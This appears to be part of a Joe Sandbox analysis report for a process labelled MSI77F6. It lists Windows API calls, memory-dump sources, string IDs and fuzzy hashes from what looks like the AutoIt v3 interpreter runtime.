                                        • DrawFocusRect.USER32(?,?), ref: 007DD4F8
                                        • GetSysColor.USER32(00000011), ref: 007DD506
                                        • SetTextColor.GDI32(?,00000000), ref: 007DD50E
                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007DD522
                                        • SelectObject.GDI32(?,007DD0B5), ref: 007DD539
                                        • DeleteObject.GDI32(?), ref: 007DD544
                                        • SelectObject.GDI32(?,?), ref: 007DD54A
                                        • DeleteObject.GDI32(?), ref: 007DD54F
                                        • SetTextColor.GDI32(?,?), ref: 007DD555
                                        • SetBkColor.GDI32(?,?), ref: 007DD55F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1996641542-0
                                        • Opcode ID: d514d6d5c8842de8ca934f0c8ab3835772ac7a0452aa8b77cf7119e6cdb848c7
                                        • Instruction ID: 942589d4feb3185320abe58f261c838c81268f4559061cb3b58f0c71392892be
                                        • Opcode Fuzzy Hash: d514d6d5c8842de8ca934f0c8ab3835772ac7a0452aa8b77cf7119e6cdb848c7
                                        • Instruction Fuzzy Hash: F6511B71900208EFDF209FA8DC48EAE7BBAFB09320F218515F915AB2A1D7799D40DB54
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007DB5C0
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007DB5D1
                                        • CharNextW.USER32(0000014E), ref: 007DB600
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007DB641
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007DB657
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007DB668
                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007DB685
                                        • SetWindowTextW.USER32(?,0000014E), ref: 007DB6D7
                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007DB6ED
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 007DB71E
                                        • _memset.LIBCMT ref: 007DB743
                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007DB78C
                                        • _memset.LIBCMT ref: 007DB7EB
                                        • SendMessageW.USER32 ref: 007DB815
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 007DB86D
                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 007DB91A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 007DB93C
                                        • GetMenuItemInfoW.USER32(?), ref: 007DB986
                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007DB9B3
                                        • DrawMenuBar.USER32(?), ref: 007DB9C2
                                        • SetWindowTextW.USER32(?,0000014E), ref: 007DB9EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                        • String ID: 0
                                        • API String ID: 1073566785-4108050209
                                        • Opcode ID: a175d5b45b9c280cdbe6a7df0946b9f09713d413515a5d286febc9dc3fe9c8aa
                                        • Instruction ID: c6276555145d62572aa6e85d1d653281599a5c9ac4175d3930ccd72e4407b0ef
                                        • Opcode Fuzzy Hash: a175d5b45b9c280cdbe6a7df0946b9f09713d413515a5d286febc9dc3fe9c8aa
                                        • Instruction Fuzzy Hash: C7E18F71900218EBDF209FA1DC88EEE7BB8FF45750F118156F919AB290DB788A51DF60
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 007D7587
                                        • GetDesktopWindow.USER32 ref: 007D759C
                                        • GetWindowRect.USER32(00000000), ref: 007D75A3
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007D7605
                                        • DestroyWindow.USER32(?), ref: 007D7631
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007D765A
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007D7678
                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007D769E
                                        • SendMessageW.USER32(?,00000421,?,?), ref: 007D76B3
                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007D76C6
                                        • IsWindowVisible.USER32(?), ref: 007D76E6
                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007D7701
                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007D7715
                                        • GetWindowRect.USER32(?,?), ref: 007D772D
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 007D7753
                                        • GetMonitorInfoW.USER32 ref: 007D776D
                                        • CopyRect.USER32(?,?), ref: 007D7784
                                        • SendMessageW.USER32(?,00000412,00000000), ref: 007D77EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: f834b01a300fd9f919047bd3dbe7c987be7f92237aadb75b04e5af60b2d8b886
                                        • Instruction ID: c65b214166bace9e10abf2ab2f9cc2ef19fe1134d888741997e4e8020d540f2e
                                        • Opcode Fuzzy Hash: f834b01a300fd9f919047bd3dbe7c987be7f92237aadb75b04e5af60b2d8b886
                                        • Instruction Fuzzy Hash: D2B17D71608340AFDB14DF64C948A6ABBF5BF88350F00891EF5999B291E778EC05CB56
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0078A839
                                        • GetSystemMetrics.USER32(00000007), ref: 0078A841
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0078A86C
                                        • GetSystemMetrics.USER32(00000008), ref: 0078A874
                                        • GetSystemMetrics.USER32(00000004), ref: 0078A899
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0078A8B6
                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0078A8C6
                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0078A8F9
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0078A90D
                                        • GetClientRect.USER32(00000000,000000FF), ref: 0078A92B
                                        • GetStockObject.GDI32(00000011), ref: 0078A947
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0078A952
                                          • Part of subcall function 0078B736: GetCursorPos.USER32(000000FF), ref: 0078B749
                                          • Part of subcall function 0078B736: ScreenToClient.USER32(00000000,000000FF), ref: 0078B766
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000001), ref: 0078B78B
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000002), ref: 0078B799
                                        • SetTimer.USER32(00000000,00000000,00000028,0078ACEE), ref: 0078A979
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: dde3456a3b06d87aaf2e754dc84d1b2b2f80a60ad1ebe717a777a645a223cc24
                                        • Instruction ID: 119af9088c52823c47f03e36066741d489c10c3d5738f3ea4669f6f32a1dceb8
                                        • Opcode Fuzzy Hash: dde3456a3b06d87aaf2e754dc84d1b2b2f80a60ad1ebe717a777a645a223cc24
                                        • Instruction Fuzzy Hash: A0B18D3164020AEFDB14EFA8DC49BAD7BB5FB48714F10462AFA15E7290D778E800CB55
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 007D6A52
                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007D6B12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                        • API String ID: 3974292440-719923060
                                        • Opcode ID: e0ad133672f9f0244e307ad77e3b34dd3557d500402a5ed51170be08b59ea1a3
                                        • Instruction ID: 539ffe0fb68e3d9e13d647558f24794205eca3159806f2967adc3627b86459e0
                                        • Opcode Fuzzy Hash: e0ad133672f9f0244e307ad77e3b34dd3557d500402a5ed51170be08b59ea1a3
                                        • Instruction Fuzzy Hash: 9FA1A170254201DFCB14FF24C855A6A77A6FF85354F14886EF89A9B392DB38EC09CB52
                                        APIs
                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 007AE6E1
                                        • _wcscmp.LIBCMT ref: 007AE6F2
                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 007AE71A
                                        • CharUpperBuffW.USER32(?,00000000), ref: 007AE737
                                        • _wcscmp.LIBCMT ref: 007AE755
                                        • _wcsstr.LIBCMT ref: 007AE766
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 007AE79E
                                        • _wcscmp.LIBCMT ref: 007AE7AE
                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 007AE7D5
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 007AE81E
                                        • _wcscmp.LIBCMT ref: 007AE82E
                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 007AE856
                                        • GetWindowRect.USER32(00000004,?), ref: 007AE8BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                        • String ID: @$ThumbnailClass
                                        • API String ID: 1788623398-1539354611
                                        • Opcode ID: 7012e3631a3bc39074b851bacab12c10205eca640a63547954b02f5d1f2ee687
                                        • Instruction ID: 32f1a2305f15c7e620c60f76fee5f075b184d0abda24b982fc8d3e37b0bac8a6
                                        • Opcode Fuzzy Hash: 7012e3631a3bc39074b851bacab12c10205eca640a63547954b02f5d1f2ee687
                                        • Instruction Fuzzy Hash: B481C231004305DBDB15DF10C885FAA7BE8FF85354F04866AFD899A092DB38ED46CBA1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                        • API String ID: 1038674560-1810252412
                                        • Opcode ID: 259c8248f3931eb8db92ad6e7dff8461bbb66ff32fe6d8d794e8319c6c87ba4c
                                        • Instruction ID: 568c0940fb3e2f1940e92234aba8f7b4bda840f03078710fe374629f86ea7d79
                                        • Opcode Fuzzy Hash: 259c8248f3931eb8db92ad6e7dff8461bbb66ff32fe6d8d794e8319c6c87ba4c
                                        • Instruction Fuzzy Hash: 3531E032A08216F6CE18FB50ED17EAE73A4AF12754F600624F425B11D2FFAD6F24C611
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 007AF8AB
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007AF8BD
                                        • SetWindowTextW.USER32(?,?), ref: 007AF8D4
                                        • GetDlgItem.USER32(?,000003EA), ref: 007AF8E9
                                        • SetWindowTextW.USER32(00000000,?), ref: 007AF8EF
                                        • GetDlgItem.USER32(?,000003E9), ref: 007AF8FF
                                        • SetWindowTextW.USER32(00000000,?), ref: 007AF905
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007AF926
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007AF940
                                        • GetWindowRect.USER32(?,?), ref: 007AF949
                                        • SetWindowTextW.USER32(?,?), ref: 007AF9B4
                                        • GetDesktopWindow.USER32 ref: 007AF9BA
                                        • GetWindowRect.USER32(00000000), ref: 007AF9C1
                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007AFA0D
                                        • GetClientRect.USER32(?,?), ref: 007AFA1A
                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007AFA3F
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007AFA6A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                        • String ID:
                                        • API String ID: 3869813825-0
                                        • Opcode ID: 1507ad0b990d584739d084f49b60d2fb74bc0486302344e91b398172953e3532
                                        • Instruction ID: 4264b96ead0121a1ac31942170f232083a903e89713f5801283aecc301141c26
                                        • Opcode Fuzzy Hash: 1507ad0b990d584739d084f49b60d2fb74bc0486302344e91b398172953e3532
                                        • Instruction Fuzzy Hash: 51514A70900709EFDB209FA8CD89BAEBBB5FF44745F004A28E596E25A0C778A944CB10
                                        APIs
                                        • _wcscpy.LIBCMT ref: 007C026A
                                        • _wcschr.LIBCMT ref: 007C0278
                                        • _wcscpy.LIBCMT ref: 007C028F
                                        • _wcscat.LIBCMT ref: 007C029E
                                        • _wcscat.LIBCMT ref: 007C02BC
                                        • _wcscpy.LIBCMT ref: 007C02DD
                                        • __wsplitpath.LIBCMT ref: 007C03BA
                                        • _wcscpy.LIBCMT ref: 007C03DF
                                        • _wcscpy.LIBCMT ref: 007C03F1
                                        • _wcscpy.LIBCMT ref: 007C0406
                                        • _wcscat.LIBCMT ref: 007C041B
                                        • _wcscat.LIBCMT ref: 007C042D
                                        • _wcscat.LIBCMT ref: 007C0442
                                          • Part of subcall function 007BC890: _wcscmp.LIBCMT ref: 007BC92A
                                          • Part of subcall function 007BC890: __wsplitpath.LIBCMT ref: 007BC96F
                                          • Part of subcall function 007BC890: _wcscpy.LIBCMT ref: 007BC982
                                          • Part of subcall function 007BC890: _wcscat.LIBCMT ref: 007BC995
                                          • Part of subcall function 007BC890: __wsplitpath.LIBCMT ref: 007BC9BA
                                          • Part of subcall function 007BC890: _wcscat.LIBCMT ref: 007BC9D0
                                          • Part of subcall function 007BC890: _wcscat.LIBCMT ref: 007BC9E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                        • String ID: >>>AUTOIT SCRIPT<<<
                                        • API String ID: 2955681530-2806939583
                                        • Opcode ID: 01bcec92cf9e2d7981efbf7591e98190d97a4f63224e862a72ef8a5aa4930553
                                        • Instruction ID: 84a33ccbcf88c9eeb866885f5a6827537bd74d4fe3e9ac338a8fc9f05300e6db
                                        • Opcode Fuzzy Hash: 01bcec92cf9e2d7981efbf7591e98190d97a4f63224e862a72ef8a5aa4930553
                                        • Instruction Fuzzy Hash: 8D919071504741EFCB24EB50D959F9BB3E8AF85320F04885DF5499B292EB38EA44CB92
                                        APIs
                                        • _memset.LIBCMT ref: 007DCD0B
                                        • DestroyWindow.USER32(00000000,?), ref: 007DCD83
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007DCE04
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007DCE26
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DCE35
                                        • DestroyWindow.USER32(?), ref: 007DCE52
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00770000,00000000), ref: 007DCE85
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DCEA4
                                        • GetDesktopWindow.USER32 ref: 007DCEB9
                                        • GetWindowRect.USER32(00000000), ref: 007DCEC0
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007DCED2
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007DCEEA
                                          • Part of subcall function 0078B155: GetWindowLongW.USER32(?,000000EB), ref: 0078B166
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                        • String ID: 0$tooltips_class32
                                        • API String ID: 1297703922-3619404913
                                        • Opcode ID: 40ed6d931b141c99cb4b8175b663470e534736a6d13645305c0e03fd331773de
                                        • Instruction ID: 367951ed8da995076b7388a17699af4feb55bfa06b09d71c51d8a14fce6c316e
                                        • Opcode Fuzzy Hash: 40ed6d931b141c99cb4b8175b663470e534736a6d13645305c0e03fd331773de
                                        • Instruction Fuzzy Hash: 53717CB1144206AFDB26CF28CC49FAA7BF9FB88744F444919F985973A1D778E801CB15
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 007BB46D
                                        • VariantCopy.OLEAUT32(?,?), ref: 007BB476
                                        • VariantClear.OLEAUT32(?), ref: 007BB482
                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007BB561
                                        • __swprintf.LIBCMT ref: 007BB591
                                        • VarR8FromDec.OLEAUT32(?,?), ref: 007BB5BD
                                        • VariantInit.OLEAUT32(?), ref: 007BB63F
                                        • SysFreeString.OLEAUT32(00000016), ref: 007BB6D1
                                        • VariantClear.OLEAUT32(?), ref: 007BB727
                                        • VariantClear.OLEAUT32(?), ref: 007BB736
                                        • VariantInit.OLEAUT32(00000000), ref: 007BB772
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                        • API String ID: 3730832054-3931177956
                                        • Opcode ID: 9a7b5431773bd77af037dfc8fb4484911ae70c17d2c30becb7dba729e5c86a62
                                        • Instruction ID: 0447ec0aaa5ce95f08beae2d2d2b73f7c64daa0c142d77b2af003039cf06fd06
                                        • Opcode Fuzzy Hash: 9a7b5431773bd77af037dfc8fb4484911ae70c17d2c30becb7dba729e5c86a62
                                        • Instruction Fuzzy Hash: 2DC1DF71A00615EFCB209FA5D889BB9B7B4FF45300F248466EC459B582DBBCEC50DBA1
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 007D6FF9
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007D7044
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 3974292440-4258414348
